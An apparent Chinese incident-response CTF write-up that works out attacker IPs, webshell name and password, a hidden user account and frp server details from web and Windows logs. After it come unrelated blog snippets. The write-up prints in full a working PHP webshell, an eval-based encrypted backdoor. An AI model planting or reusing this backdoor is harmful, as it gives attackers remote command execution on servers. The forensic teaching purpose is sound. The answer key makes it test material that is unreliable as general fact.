news 2026/6/25 14:17:03

应急响应web2

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
应急响应web2

在解题前,请确保您已解的一下内容:

1.攻击者的IP地址(两个)?

2.攻击者的webshell文件名?

3.攻击者的webshell密码?

4.攻击者的QQ号?

5.攻击者的服务器伪IP地址?

6.攻击者的服务器端口?

7.攻击者是如何入侵的(选择题)?

8.攻击者的隐藏用户名?

一、两个ip地址

扫描出来是一个system.php文件

<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='hack6618'; $payloadName='payload'; $key='7813d1590d28a7dd'; if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } }

这段PHP代码是一个典型的Webshell后门程序,用于在受感染的服务器上执行远程命令。

然后我们分析日志。

日志路径C:\phpstudy_pro\Extensions\Apache2.4.39\logs

192.168.126.135

接下来我们分析windows的系统日志,使用APT-Hunter工具的powershell日志收集器自动收集日志信息,将得到的日志解压。

Powershell:

cd C:\你的路径\APT-Hunter-3.2

解除系统默认脚本执行限制(仅首次需要):

Set-ExecutionPolicy RemoteSigned # 弹出提示输入 Y 确认

一键自动采集命令:

.\windows-log-collector-full-v3-CSV.ps1

使用 APT-Hunter 主 Python 脚本自动分析这批日志:

python APT-Hunter.py -p C:\Users\Administrator\Desktop\logs\wineventlog -o Project1 -allreport -p:提供包含使用powershell日志收集器提取的日志的解压路径 -o:输出生成项目的名称

192.168.126.129

二、攻击者的webshell文件名?

system.php

三、攻击者的webshell密码?

hack6618

四、攻击者的QQ号?

Tecent files 腾讯文件(可能指的是QQ之类的)

攻击者的QQ号:777888999321

五、攻击者的服务器伪IP地址?

在隐藏用户的文件中搜集信息:

FileRecv为QQ的接收的文件夹,发现frp内网穿透工具

找到配置信息查看:

256.256.66.88

六、攻击者的服务器端口?

65536

七、攻击者是如何入侵的(选择题)?

查看ftp日志文件:

分析日志文件,查找后门system.php文件,发现正在进行爆破

八、攻击者的隐藏用户名?

hack887


成功

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/25 14:09:20

认识下新的 Visual Studio Debugger Agent Workflow

调试不仅仅是修复代码&#xff0c;更是降低不确定性。如今&#xff0c;我们将在 Visual Studio 现有的 Debugger Agent 中&#xff0c;推出全新升级的引导式工作流&#xff0c;朝着解决这一问题迈出重大一步。以引导式调试循环终结“猜谜式排错”实话实说&#xff1a;传统调试过…

作者头像 李华
网站建设 2026/6/25 14:08:27

《人生底稿 38》赤峰收官返程:热忱现场与为打卡折返的名场面

一、远赴远端现场&#xff0c;遇极致热忱的甲方团队赤峰外勤第二日&#xff0c;一早吃完早餐便直接退房。当天计划下午返程回津&#xff0c;上午抓紧时间奔赴最后一处距离较远的三级平台现场。和前一日冷淡的对接氛围截然不同&#xff0c;这一处现场的领导格外热情、爽快&#…

作者头像 李华
网站建设 2026/6/25 14:08:25

AI生成内容的可信边界与工程化落地实践

我理解您的要求&#xff0c;但需要明确说明&#xff1a;您提供的输入内容存在根本性合规风险。该项目标题与正文核心围绕“2034年90%故事将由AI撰写”这一预测性断言展开&#xff0c;其原始出处为Towards AI平台一篇带有明显媒体传播属性的评论类文章&#xff0c;文中混杂了未经…

作者头像 李华
网站建设 2026/6/25 14:08:05

GoGoGo虚拟定位:无需ROOT的Android位置模拟终极指南

GoGoGo虚拟定位&#xff1a;无需ROOT的Android位置模拟终极指南 【免费下载链接】GoGoGo 一个基于 Android 调试 API 百度地图实现的虚拟定位工具&#xff0c;并且同时实现了一个可以自由移动的摇杆 项目地址: https://gitcode.com/GitHub_Trending/go/GoGoGo 想要在An…

作者头像 李华
网站建设 2026/6/25 14:07:28

Qwen3-ASR双模型架构:多语种识别与非自回归强制对齐实战解析

我理解你的严格要求&#xff0c;也完全认同内容安全、专业深度与表达真实性的绝对优先级。以下是我基于你提供的原始材料&#xff0c;以一名深耕语音技术领域十年、常年在一线做ASR系统选型、部署与定制化落地的工程师视角&#xff0c;重新构建的完整博文。全文严格遵循你设定的…

作者头像 李华